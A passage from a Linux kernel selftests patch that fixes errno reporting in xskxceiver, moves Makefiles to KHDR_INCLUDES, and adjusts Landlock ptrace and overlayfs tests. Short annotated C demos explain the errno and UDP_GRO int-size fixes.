+ 					if (ret < 0)
+-						exit_with_error(-ret);
++						exit_with_error(errno);
+ 				}
+ 				ret = xsk_ring_prod__reserve(&umem->fq, rcvd, &idx_fq);
+ 			}
+@@ -1014,7 +1014,7 @@ static int __send_pkts(struct ifobject *ifobject, u32 *pkt_nb, struct pollfd *fd
+ 			if (timeout) {
+ 				if (ret < 0) {
+ 					ksft_print_msg("ERROR: [%s] Poll error %d\n",
+-						       __func__, ret);
++						       __func__, errno);
+ 					return TEST_FAILURE;
+ 				}
+ 				if (ret == 0)
+@@ -1023,7 +1023,7 @@ static int __send_pkts(struct ifobject *ifobject, u32 *pkt_nb, struct pollfd *fd
+ 			}
+ 			if (ret <= 0) {
+ 				ksft_print_msg("ERROR: [%s] Poll error %d\n",
+-					       __func__, ret);
++					       __func__, errno);
+ 				return TEST_FAILURE;
+ 			}
+ 		}
+@@ -1322,18 +1322,18 @@ static void thread_common_ops(struct test_spec *test, struct ifobject *ifobject)
+ 	if (ifobject->xdp_flags & XDP_FLAGS_SKB_MODE) {
+ 		if (opts.attach_mode != XDP_ATTACHED_SKB) {
+ 			ksft_print_msg("ERROR: [%s] XDP prog not in SKB mode\n");
+-			exit_with_error(-EINVAL);
++			exit_with_error(EINVAL);
+ 		}
+ 	} else if (ifobject->xdp_flags & XDP_FLAGS_DRV_MODE) {
+ 		if (opts.attach_mode != XDP_ATTACHED_DRV) {
+ 			ksft_print_msg("ERROR: [%s] XDP prog not in DRV mode\n");
+-			exit_with_error(-EINVAL);
++			exit_with_error(EINVAL);
+ 		}
+ 	}
+ 
+ 	ret = xsk_socket__update_xskmap(ifobject->xsk->xsk, ifobject->xsk_map_fd);
+ 	if (ret)
+-		exit_with_error(-ret);
++		exit_with_error(errno);
+ }
+ 
+ static void *worker_testapp_validate_tx(void *arg)
+@@ -1540,7 +1540,7 @@ static void swap_xsk_resources(struct ifobject *ifobj_tx, struct ifobject *ifobj
+ 
+ 	ret = xsk_socket__update_xskmap(ifobj_rx->xsk->xsk, ifobj_rx->xsk_map_fd);
+ 	if (ret)
+-		exit_with_error(-ret);
++		exit_with_error(errno);
+ }
+ 
+ static void testapp_bpf_res(struct test_spec *test)
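The xskxceiver fixes all follow from one rule: poll(2) and related calls return -1 on failure and leave the cause in errno, so exit_with_error(-ret) always reported error 1 (EPERM) no matter what actually went wrong. A small demonstration; the call below is deliberately invalid in order to provoke a failure.

#include <errno.h>
#include <poll.h>
#include <stdio.h>
#include <string.h>

int main(void)
{
	/* NULL fds with nfds = 1 makes the kernel fail with EFAULT. */
	int ret = poll(NULL, 1, 0);

	if (ret < 0) {
		/* Wrong: ret is -1, so -ret is 1 (EPERM) regardless
		 * of the real cause. */
		printf("wrong: %s\n", strerror(-ret));
		/* Right: errno carries the actual cause (EFAULT here). */
		printf("right: %s\n", strerror(errno));
	}
	return 0;
}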
+diff --git a/tools/testing/selftests/clone3/Makefile b/tools/testing/selftests/clone3/Makefile
+index 79b19a2863a0b..84832c369a2ea 100644
+--- a/tools/testing/selftests/clone3/Makefile
++++ b/tools/testing/selftests/clone3/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -g -std=gnu99 -I../../../../usr/include/
++CFLAGS += -g -std=gnu99 $(KHDR_INCLUDES)
+ LDLIBS += -lcap
+ 
+ TEST_GEN_PROGS := clone3 clone3_clear_sighand clone3_set_tid \
+diff --git a/tools/testing/selftests/core/Makefile b/tools/testing/selftests/core/Makefile
+index f6f2d6f473c6a..ce262d0972699 100644
+--- a/tools/testing/selftests/core/Makefile
++++ b/tools/testing/selftests/core/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := close_range_test
+ 
+diff --git a/tools/testing/selftests/dmabuf-heaps/Makefile b/tools/testing/selftests/dmabuf-heaps/Makefile
+index 604b43ece15f5..9e7e158d5fa32 100644
+--- a/tools/testing/selftests/dmabuf-heaps/Makefile
++++ b/tools/testing/selftests/dmabuf-heaps/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -static -O3 -Wl,-no-as-needed -Wall
++CFLAGS += -static -O3 -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS = dmabuf-heap
+ 
+diff --git a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+index 29af27acd40ea..890a8236a8ba7 100644
+--- a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
++++ b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+@@ -13,10 +13,9 @@
+ #include <sys/types.h>
+ 
+ #include <linux/dma-buf.h>
++#include <linux/dma-heap.h>
+ #include <drm/drm.h>
+ 
+-#include "../../../../include/uapi/linux/dma-heap.h"
+-
+ #define DEVPATH "/dev/dma_heap"
+ 
+ static int check_vgem(int fd)
+diff --git a/tools/testing/selftests/drivers/dma-buf/Makefile b/tools/testing/selftests/drivers/dma-buf/Makefile
+index 79cb16b4e01a9..441407bb0e801 100644
+--- a/tools/testing/selftests/drivers/dma-buf/Makefile
++++ b/tools/testing/selftests/drivers/dma-buf/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := udmabuf
+ 
+diff --git a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+index a08c02abde121..7f7d20f222070 100755
+--- a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
++++ b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+@@ -17,6 +17,18 @@ SYSFS_NET_DIR=/sys/bus/netdevsim/devices/$DEV_NAME/net/
+ DEBUGFS_DIR=/sys/kernel/debug/netdevsim/$DEV_NAME/
+ DL_HANDLE=netdevsim/$DEV_NAME
+ 
++wait_for_devlink()
++{
++	"$@" | grep -q $DL_HANDLE
++}
++
++devlink_wait()
++{
++	local timeout=$1
++
++	busywait "$timeout" wait_for_devlink devlink dev
++}
++
+ fw_flash_test()
+ {
+ 	RET=0
+@@ -256,6 +268,9 @@ netns_reload_test()
+ 	ip netns del testns2
+ 	ip netns del testns1
+ 
++	# Wait until netns async cleanup is done.
++	devlink_wait 2000
++
+ 	log_test "netns reload test"
+ }
+ 
+@@ -348,6 +363,9 @@ resource_test()
+ 	ip netns del testns2
+ 	ip netns del testns1
+ 
++	# Wait until netns async cleanup is done.
++	devlink_wait 2000
++
+ 	log_test "resource test"
+ }
+ 
+diff --git a/tools/testing/selftests/drivers/s390x/uvdevice/Makefile b/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
+index 891215a7dc8a1..755d164384c46 100644
+--- a/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
++++ b/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
+@@ -11,10 +11,9 @@ else
+ TEST_GEN_PROGS := test_uvdevice
+ 
+ top_srcdir ?= ../../../../../..
+-khdr_dir = $(top_srcdir)/usr/include
+ LINUX_TOOL_ARCH_INCLUDE = $(top_srcdir)/tools/arch/$(ARCH)/include
+ 
+-CFLAGS += -Wall -Werror -static -I$(khdr_dir) -I$(LINUX_TOOL_ARCH_INCLUDE)
++CFLAGS += -Wall -Werror -static $(KHDR_INCLUDES) -I$(LINUX_TOOL_ARCH_INCLUDE)
+ 
+ include ../../../lib.mk
+ 
+diff --git a/tools/testing/selftests/filesystems/Makefile b/tools/testing/selftests/filesystems/Makefile
+index 129880fb42d34..c647fd6a0446a 100644
+--- a/tools/testing/selftests/filesystems/Makefile
++++ b/tools/testing/selftests/filesystems/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := devpts_pts
+ TEST_GEN_PROGS_EXTENDED := dnotify_test
+ 
+diff --git a/tools/testing/selftests/filesystems/binderfs/Makefile b/tools/testing/selftests/filesystems/binderfs/Makefile
+index 8af25ae960498..c2f7cef919c04 100644
+--- a/tools/testing/selftests/filesystems/binderfs/Makefile
++++ b/tools/testing/selftests/filesystems/binderfs/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/ -pthread
++CFLAGS += $(KHDR_INCLUDES) -pthread
+ TEST_GEN_PROGS := binderfs_test
+ 
+ binderfs_test: binderfs_test.c ../../kselftest.h ../../kselftest_harness.h
+diff --git a/tools/testing/selftests/filesystems/epoll/Makefile b/tools/testing/selftests/filesystems/epoll/Makefile
+index 78ae4aaf7141a..0788a7dc80042 100644
+--- a/tools/testing/selftests/filesystems/epoll/Makefile
++++ b/tools/testing/selftests/filesystems/epoll/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ LDLIBS += -lpthread
+ TEST_GEN_PROGS := epoll_wakeup_test
+ 
+diff --git a/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc b/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
+index fc1daac7f0668..4f5e8c6651562 100644
+--- a/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
++++ b/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
+@@ -22,6 +22,8 @@ check_error 'e:foo/^bar.1 syscalls/sys_enter_openat'	# BAD_EVENT_NAME
+ check_error 'e:foo/bar syscalls/sys_enter_openat arg=^dfd'	# BAD_FETCH_ARG
+ check_error 'e:foo/bar syscalls/sys_enter_openat ^arg=$foo'	# BAD_ATTACH_ARG
+ 
+-check_error 'e:foo/bar syscalls/sys_enter_openat if ^'	# NO_EP_FILTER
++if grep -q '<attached-group>\.<attached-event>.*\[if <filter>\]' README; then
++  check_error 'e:foo/bar syscalls/sys_enter_openat if ^'	# NO_EP_FILTER
++fi
+ 
+ exit 0
+diff --git a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+index 3eea2abf68f9e..2ad7d4b501cc1 100644
+--- a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
++++ b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+@@ -42,7 +42,7 @@ test_event_enabled() {
+ 
+     while [ $check_times -ne 0 ]; do
+ 	e=`cat $EVENT_ENABLE`
+-	if [ "$e" == $val ]; then
++	if [ "$e" = $val ]; then
+ 	    return 0
+ 	fi
+ 	sleep $SLEEP_TIME
+diff --git a/tools/testing/selftests/futex/functional/Makefile b/tools/testing/selftests/futex/functional/Makefile
+index 5a0e0df8de9b3..a392d0917b4e5 100644
+--- a/tools/testing/selftests/futex/functional/Makefile
++++ b/tools/testing/selftests/futex/functional/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-INCLUDES := -I../include -I../../ -I../../../../../usr/include/
++INCLUDES := -I../include -I../../ $(KHDR_INCLUDES)
+ CFLAGS := $(CFLAGS) -g -O2 -Wall -D_GNU_SOURCE -pthread $(INCLUDES) $(KHDR_INCLUDES)
+ LDLIBS := -lpthread -lrt
+ 
+diff --git a/tools/testing/selftests/gpio/Makefile b/tools/testing/selftests/gpio/Makefile
+index 616ed40196554..e0884390447dc 100644
+--- a/tools/testing/selftests/gpio/Makefile
++++ b/tools/testing/selftests/gpio/Makefile
+@@ -3,6 +3,6 @@
+ TEST_PROGS := gpio-mockup.sh gpio-sim.sh
+ TEST_FILES := gpio-mockup-sysfs.sh
+ TEST_GEN_PROGS_EXTENDED := gpio-mockup-cdev gpio-chip-info gpio-line-name
+-CFLAGS += -O2 -g -Wall -I../../../../usr/include/ $(KHDR_INCLUDES)
++CFLAGS += -O2 -g -Wall $(KHDR_INCLUDES)
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/ipc/Makefile b/tools/testing/selftests/ipc/Makefile
+index 1c4448a843a41..50e9c299fc4ae 100644
+--- a/tools/testing/selftests/ipc/Makefile
++++ b/tools/testing/selftests/ipc/Makefile
+@@ -10,7 +10,7 @@ ifeq ($(ARCH),x86_64)
+ 	CFLAGS := -DCONFIG_X86_64 -D__x86_64__
+ endif
+ 
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := msgque
+ 
+diff --git a/tools/testing/selftests/kcmp/Makefile b/tools/testing/selftests/kcmp/Makefile
+index b4d39f6b5124d..59a1e53790181 100644
+--- a/tools/testing/selftests/kcmp/Makefile
++++ b/tools/testing/selftests/kcmp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := kcmp_test
+ 
+diff --git a/tools/testing/selftests/landlock/fs_test.c b/tools/testing/selftests/landlock/fs_test.c
+index 45de42a027c54..f2c3bffa6ea51 100644
+--- a/tools/testing/selftests/landlock/fs_test.c
++++ b/tools/testing/selftests/landlock/fs_test.c
+@@ -11,6 +11,7 @@
+ #include <fcntl.h>
+ #include <linux/landlock.h>
+ #include <sched.h>
++#include <stdio.h>
+ #include <string.h>
+ #include <sys/capability.h>
+ #include <sys/mount.h>
+@@ -87,6 +88,40 @@ static const char dir_s3d3[] = TMP_DIR "/s3d1/s3d2/s3d3";
+  *         └── s3d3
+  */
+ 
++static bool fgrep(FILE *const inf, const char *const str)
++{
++	char line[32];
++	const int slen = strlen(str);
++
++	while (!feof(inf)) {
++		if (!fgets(line, sizeof(line), inf))
++			break;
++		if (strncmp(line, str, slen))
++			continue;
++
++		return true;
++	}
++
++	return false;
++}
++
++static bool supports_overlayfs(void)
++{
++	bool res;
++	FILE *const inf = fopen("/proc/filesystems", "r");
++
++	/*
++	 * Consider that the filesystem is supported if we cannot get the
++	 * supported ones.
++	 */
++	if (!inf)
++		return true;
++
++	res = fgrep(inf, "nodev\toverlay\n");
++	fclose(inf);
++	return res;
++}
++
+ static void mkdir_parents(struct __test_metadata *const _metadata,
+ 			  const char *const path)
+ {
+@@ -3539,6 +3574,9 @@ FIXTURE(layout2_overlay) {};
+ 
+ FIXTURE_SETUP(layout2_overlay)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	prepare_layout(_metadata);
+ 
+ 	create_directory(_metadata, LOWER_BASE);
+@@ -3575,6 +3613,9 @@ FIXTURE_SETUP(layout2_overlay)
+ 
+ FIXTURE_TEARDOWN(layout2_overlay)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	EXPECT_EQ(0, remove_path(lower_do1_fl3));
+ 	EXPECT_EQ(0, remove_path(lower_dl1_fl2));
+ 	EXPECT_EQ(0, remove_path(lower_fl1));
+@@ -3606,6 +3647,9 @@ FIXTURE_TEARDOWN(layout2_overlay)
+ 
+ TEST_F_FORK(layout2_overlay, no_restriction)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	ASSERT_EQ(0, test_open(lower_fl1, O_RDONLY));
+ 	ASSERT_EQ(0, test_open(lower_dl1, O_RDONLY));
+ 	ASSERT_EQ(0, test_open(lower_dl1_fl2, O_RDONLY));
+@@ -3769,6 +3813,9 @@ TEST_F_FORK(layout2_overlay, same_content_different_file)
+ 	size_t i;
+ 	const char *path_entry;
+ 
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	/* Sets rules on base directories (i.e. outside overlay scope). */
+ 	ruleset_fd = create_ruleset(_metadata, ACCESS_RW, layer1_base);
+ 	ASSERT_LE(0, ruleset_fd);
+diff --git a/tools/testing/selftests/landlock/ptrace_test.c b/tools/testing/selftests/landlock/ptrace_test.c
+index c28ef98ff3ac1..55e7871631a19 100644
+--- a/tools/testing/selftests/landlock/ptrace_test.c
++++ b/tools/testing/selftests/landlock/ptrace_test.c
+@@ -19,6 +19,12 @@
+ 
+ #include "common.h"
+ 
++/* Copied from security/yama/yama_lsm.c */
++#define YAMA_SCOPE_DISABLED 0
++#define YAMA_SCOPE_RELATIONAL 1
++#define YAMA_SCOPE_CAPABILITY 2
++#define YAMA_SCOPE_NO_ATTACH 3
++
+ static void create_domain(struct __test_metadata *const _metadata)
+ {
+ 	int ruleset_fd;
+@@ -60,6 +66,25 @@ static int test_ptrace_read(const pid_t pid)
+ 	return 0;
+ }
+ 
++static int get_yama_ptrace_scope(void)
++{
++	int ret;
++	char buf[2] = {};
++	const int fd = open("/proc/sys/kernel/yama/ptrace_scope", O_RDONLY);
++
++	if (fd < 0)
++		return 0;
++
++	if (read(fd, buf, 1) < 0) {
++		close(fd);
++		return -1;
++	}
++
++	ret = atoi(buf);
++	close(fd);
++	return ret;
++}
++
+ /* clang-format off */
+ FIXTURE(hierarchy) {};
+ /* clang-format on */
+@@ -232,8 +257,51 @@ TEST_F(hierarchy, trace)
+ 	pid_t child, parent;
+ 	int status, err_proc_read;
+ 	int pipe_child[2], pipe_parent[2];
++	int yama_ptrace_scope;
+ 	char buf_parent;
+ 	long ret;
++	bool can_read_child, can_trace_child, can_read_parent, can_trace_parent;
++
++	yama_ptrace_scope = get_yama_ptrace_scope();
++	ASSERT_LE(0, yama_ptrace_scope);
++
++	if (yama_ptrace_scope > YAMA_SCOPE_DISABLED)
++		TH_LOG("Incomplete tests due to Yama restrictions (scope %d)",
++		       yama_ptrace_scope);
++
++	/*
++	 * can_read_child is true if a parent process can read its child
++	 * process, which is only the case when the parent process is not
++	 * isolated from the child with a dedicated Landlock domain.
++	 */
++	can_read_child = !variant->domain_parent;
++
++	/*
++	 * can_trace_child is true if a parent process can trace its child
++	 * process.  This depends on two conditions:
++	 * - The parent process is not isolated from the child with a dedicated
++	 *   Landlock domain.
++	 * - Yama allows tracing children (up to YAMA_SCOPE_RELATIONAL).
++	 */
++	can_trace_child = can_read_child &&
++			  yama_ptrace_scope <= YAMA_SCOPE_RELATIONAL;
++
++	/*
++	 * can_read_parent is true if a child process can read its parent
++	 * process, which is only the case when the child process is not
++	 * isolated from the parent with a dedicated Landlock domain.
++	 */
++	can_read_parent = !variant->domain_child;
++
++	/*
++	 * can_trace_parent is true if a child process can trace its parent
++	 * process.  This depends on two conditions:
++	 * - The child process is not isolated from the parent with a dedicated
++	 *   Landlock domain.
++	 * - Yama is disabled (YAMA_SCOPE_DISABLED).
++	 */
++	can_trace_parent = can_read_parent &&
++			   yama_ptrace_scope <= YAMA_SCOPE_DISABLED;
+ 
+ 	/*
+ 	 * Removes all effective and permitted capabilities to not interfere
+@@ -264,16 +332,21 @@ TEST_F(hierarchy, trace)
+ 		/* Waits for the parent to be in a domain, if any. */
+ 		ASSERT_EQ(1, read(pipe_parent[0], &buf_child, 1));
+ 
+-		/* Tests PTRACE_ATTACH and PTRACE_MODE_READ on the parent. */
++		/* Tests PTRACE_MODE_READ on the parent. */
+ 		err_proc_read = test_ptrace_read(parent);
++		if (can_read_parent) {
++			EXPECT_EQ(0, err_proc_read);
++		} else {
++			EXPECT_EQ(EACCES, err_proc_read);
++		}
++
++		/* Tests PTRACE_ATTACH on the parent. */
+ 		ret = ptrace(PTRACE_ATTACH, parent, NULL, 0);
+-		if (variant->domain_child) {
++		if (can_trace_parent) {
++			EXPECT_EQ(0, ret);
++		} else {
+ 			EXPECT_EQ(-1, ret);
+ 			EXPECT_EQ(EPERM, errno);
+-			EXPECT_EQ(EACCES, err_proc_read);
+-		} else {
+-			EXPECT_EQ(0, ret);
+-			EXPECT_EQ(0, err_proc_read);
+ 		}
+ 		if (ret == 0) {
+ 			ASSERT_EQ(parent, waitpid(parent, &status, 0));
+@@ -283,11 +356,11 @@ TEST_F(hierarchy, trace)
+ 
+ 		/* Tests child PTRACE_TRACEME. */
+ 		ret = ptrace(PTRACE_TRACEME);
+-		if (variant->domain_parent) {
++		if (can_trace_child) {
++			EXPECT_EQ(0, ret);
++		} else {
+ 			EXPECT_EQ(-1, ret);
+ 			EXPECT_EQ(EPERM, errno);
+-		} else {
+-			EXPECT_EQ(0, ret);
+ 		}
+ 
+ 		/*
+@@ -296,7 +369,7 @@ TEST_F(hierarchy, trace)
+ 		 */
+ 		ASSERT_EQ(1, write(pipe_child[1], ".", 1));
+ 
+-		if (!variant->domain_parent) {
++		if (can_trace_child) {
+ 			ASSERT_EQ(0, raise(SIGSTOP));
+ 		}
+ 
+@@ -321,7 +394,7 @@ TEST_F(hierarchy, trace)
+ 	ASSERT_EQ(1, read(pipe_child[0], &buf_parent, 1));
+ 
+ 	/* Tests child PTRACE_TRACEME. */
+-	if (!variant->domain_parent) {
++	if (can_trace_child) {
+ 		ASSERT_EQ(child, waitpid(child, &status, 0));
+ 		ASSERT_EQ(1, WIFSTOPPED(status));
+ 		ASSERT_EQ(0, ptrace(PTRACE_DETACH, child, NULL, 0));
+@@ -331,17 +404,23 @@ TEST_F(hierarchy, trace)
+ 		EXPECT_EQ(ESRCH, errno);
+ 	}
+ 
+-	/* Tests PTRACE_ATTACH and PTRACE_MODE_READ on the child. */
++	/* Tests PTRACE_MODE_READ on the child. */
+ 	err_proc_read = test_ptrace_read(child);
++	if (can_read_child) {
++		EXPECT_EQ(0, err_proc_read);
++	} else {
++		EXPECT_EQ(EACCES, err_proc_read);
++	}
++
++	/* Tests PTRACE_ATTACH on the child. */
+ 	ret = ptrace(PTRACE_ATTACH, child, NULL, 0);
+-	if (variant->domain_parent) {
++	if (can_trace_child) {
++		EXPECT_EQ(0, ret);
++	} else {
+ 		EXPECT_EQ(-1, ret);
+ 		EXPECT_EQ(EPERM, errno);
+-		EXPECT_EQ(EACCES, err_proc_read);
+-	} else {
+-		EXPECT_EQ(0, ret);
+-		EXPECT_EQ(0, err_proc_read);
+ 	}
++
+ 	if (ret == 0) {
+ 		ASSERT_EQ(child, waitpid(child, &status, 0));
+ 		ASSERT_EQ(1, WIFSTOPPED(status));
+diff --git a/tools/testing/selftests/media_tests/Makefile b/tools/testing/selftests/media_tests/Makefile
+index 60826d7d37d49..471d83e61d95e 100644
+--- a/tools/testing/selftests/media_tests/Makefile
++++ b/tools/testing/selftests/media_tests/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ #
+-CFLAGS += -I../ -I../../../../usr/include/
++CFLAGS += -I../ $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := media_device_test media_device_open video_device_test
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/membarrier/Makefile b/tools/testing/selftests/membarrier/Makefile
+index 34d1c81a2324a..fc840e06ff565 100644
+--- a/tools/testing/selftests/membarrier/Makefile
++++ b/tools/testing/selftests/membarrier/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ LDLIBS += -lpthread
+ 
+ TEST_GEN_PROGS := membarrier_test_single_thread \
+diff --git a/tools/testing/selftests/mount_setattr/Makefile b/tools/testing/selftests/mount_setattr/Makefile
+index 2250f7dcb81e3..fde72df01b118 100644
+--- a/tools/testing/selftests/mount_setattr/Makefile
++++ b/tools/testing/selftests/mount_setattr/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ # Makefile for mount selftests.
+-CFLAGS = -g -I../../../../usr/include/ -Wall -O2 -pthread
++CFLAGS = -g $(KHDR_INCLUDES) -Wall -O2 -pthread
+ 
+ TEST_GEN_FILES += mount_setattr_test
+ 
+diff --git a/tools/testing/selftests/move_mount_set_group/Makefile b/tools/testing/selftests/move_mount_set_group/Makefile
+index 80c2d86812b06..94235846b6f9b 100644
+--- a/tools/testing/selftests/move_mount_set_group/Makefile
++++ b/tools/testing/selftests/move_mount_set_group/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ # Makefile for mount selftests.
+-CFLAGS = -g -I../../../../usr/include/ -Wall -O2
++CFLAGS = -g $(KHDR_INCLUDES) -Wall -O2
+ 
+ TEST_GEN_FILES += move_mount_set_group_test
+ 
+diff --git a/tools/testing/selftests/net/fib_tests.sh b/tools/testing/selftests/net/fib_tests.sh
+index 5637b5dadabdb..70ea8798b1f60 100755
+--- a/tools/testing/selftests/net/fib_tests.sh
++++ b/tools/testing/selftests/net/fib_tests.sh
+@@ -2065,6 +2065,8 @@ EOF
+ ################################################################################
+ # main
+ 
++trap cleanup EXIT
++
+ while getopts :t:pPhv o
+ do
+ 	case $o in
+diff --git a/tools/testing/selftests/net/udpgso_bench_rx.c b/tools/testing/selftests/net/udpgso_bench_rx.c
+index 4058c7451e70d..f35a924d4a303 100644
+--- a/tools/testing/selftests/net/udpgso_bench_rx.c
++++ b/tools/testing/selftests/net/udpgso_bench_rx.c
+@@ -214,11 +214,10 @@ static void do_verify_udp(const char *data, int len)
+ 
+ static int recv_msg(int fd, char *buf, int len, int *gso_size)
+ {
+-	char control[CMSG_SPACE(sizeof(uint16_t))] = {0};
++	char control[CMSG_SPACE(sizeof(int))] = {0};
+ 	struct msghdr msg = {0};
+ 	struct iovec iov = {0};
+ 	struct cmsghdr *cmsg;
+-	uint16_t *gsosizeptr;
+ 	int ret;
+ 
+ 	iov.iov_base = buf;
+@@ -237,8 +236,7 @@ static int recv_msg(int fd, char *buf, int len, int *gso_size)
+ 		     cmsg = CMSG_NXTHDR(&msg, cmsg)) {
+ 			if (cmsg->cmsg_level == SOL_UDP
+ 			    && cmsg->cmsg_type == UDP_GRO) {
+-				gsosizeptr = (uint16_t *) CMSG_DATA(cmsg);
+-				*gso_size = *gsosizeptr;
++				*gso_size = *(int *)CMSG_DATA(cmsg);
+ 				break;
+ 			}
+ 		}
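+
+ The udpgso_bench_rx change is needed because the UDP_GRO control-message
+ payload is an int (the GSO segment size), not a u16; reading it through
+ a uint16_t pointer only happened to yield the right value on
+ little-endian machines. A standalone sketch of the hazard (the payload
+ value here is made up):

#include <stdio.h>
#include <stdint.h>
#include <string.h>

int main(void)
{
	int payload = 1452;		/* kernel writes an int for UDP_GRO */
	unsigned char buf[sizeof(int)];
	uint16_t u16_view;
	int int_view;

	memcpy(buf, &payload, sizeof(payload));
	memcpy(&u16_view, buf, sizeof(u16_view));	/* old read */
	memcpy(&int_view, buf, sizeof(int_view));	/* fixed read */
	printf("u16 view: %u, int view: %d\n", u16_view, int_view);
	return 0;
}

+ On a big-endian host the u16 view would read the high half of the int
+ and report 0, which is why the fix reads the payload as an int.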
+diff --git a/tools/testing/selftests/perf_events/Makefile b/tools/testing/selftests/perf_events/Makefile
+index fcafa5f0d34c0..db93c4ff081a4 100644
+--- a/tools/testing/selftests/perf_events/Makefile
++++ b/tools/testing/selftests/perf_events/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -I../../../../usr/include
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDFLAGS += -lpthread
+ 
+ TEST_GEN_PROGS := sigtrap_threads remove_on_exec
+diff --git a/tools/testing/selftests/pid_namespace/Makefile b/tools/testing/selftests/pid_namespace/Makefile
+index edafaca1aeb39..9286a1d22cd3a 100644
+--- a/tools/testing/selftests/pid_namespace/Makefile
++++ b/tools/testing/selftests/pid_namespace/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS = regression_enomem
+ 
+diff --git a/tools/testing/selftests/pidfd/Makefile b/tools/testing/selftests/pidfd/Makefile
+index 778b6cdc8aed8..d731e3e76d5bf 100644
+--- a/tools/testing/selftests/pidfd/Makefile
++++ b/tools/testing/selftests/pidfd/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/ -pthread -Wall
++CFLAGS += -g $(KHDR_INCLUDES) -pthread -Wall
+ 
+ TEST_GEN_PROGS := pidfd_test pidfd_fdinfo_test pidfd_open_test \
+ 	pidfd_poll_test pidfd_wait pidfd_getfd_test pidfd_setns_test
+diff --git a/tools/testing/selftests/powerpc/ptrace/Makefile b/tools/testing/selftests/powerpc/ptrace/Makefile
+index 2f02cb54224dc..cbeeaeae8837a 100644
+--- a/tools/testing/selftests/powerpc/ptrace/Makefile
++++ b/tools/testing/selftests/powerpc/ptrace/Makefile
+@@ -33,7 +33,7 @@ TESTS_64 := $(patsubst %,$(OUTPUT)/%,$(TESTS_64))
+ $(TESTS_64): CFLAGS += -m64
+ $(TM_TESTS): CFLAGS += -I../tm -mhtm
+ 
+-CFLAGS += -I../../../../../usr/include -fno-pie
++CFLAGS += $(KHDR_INCLUDES) -fno-pie
+ 
+ $(OUTPUT)/ptrace-gpr: ptrace-gpr.S
+ $(OUTPUT)/ptrace-pkey $(OUTPUT)/core-pkey: LDLIBS += -pthread
+diff --git a/tools/testing/selftests/powerpc/security/Makefile b/tools/testing/selftests/powerpc/security/Makefile
+index 7488315fd8474..e0d979ab02040 100644
+--- a/tools/testing/selftests/powerpc/security/Makefile
